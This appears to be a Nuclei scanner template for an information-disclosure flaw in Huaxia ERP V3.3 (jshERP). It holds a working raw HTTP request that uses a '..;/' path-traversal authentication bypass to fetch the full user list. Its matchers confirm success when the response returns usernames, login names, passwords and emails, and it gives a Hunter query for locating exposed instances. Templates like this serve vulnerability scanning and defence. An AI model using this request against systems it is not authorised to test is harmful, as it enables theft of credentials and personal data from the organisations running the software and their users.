id: huaxia-erp-getAllList-disclosure
info:
  name: 华夏 ERPV3.3 getAllList - disclsoure
  author: leadlife
  severity: high
  description: 华夏ERPV3.3存在信息泄漏漏洞，可获取用户敏感信息。
  reference: 
    - https://github.com/wy876/POC/blob/main/%E5%8D%8E%E5%A4%8FERP/%E5%8D%8E%E5%A4%8FERPV3.3%E5%AD%98%E5%9C%A8%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    max-request: 1
    hunter-query: web.icon=="f6efcd53ba2b07d67ab993073c238a11"
  tags: huaxia,erp,disclosure


http:
  - raw:
      - |
        GET /jshERP-boot/platformConfig/getPlatform/..;/..;/..;/jshERP-boot/user/getAllList HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body,'username','loginName','password','email')
        condition: and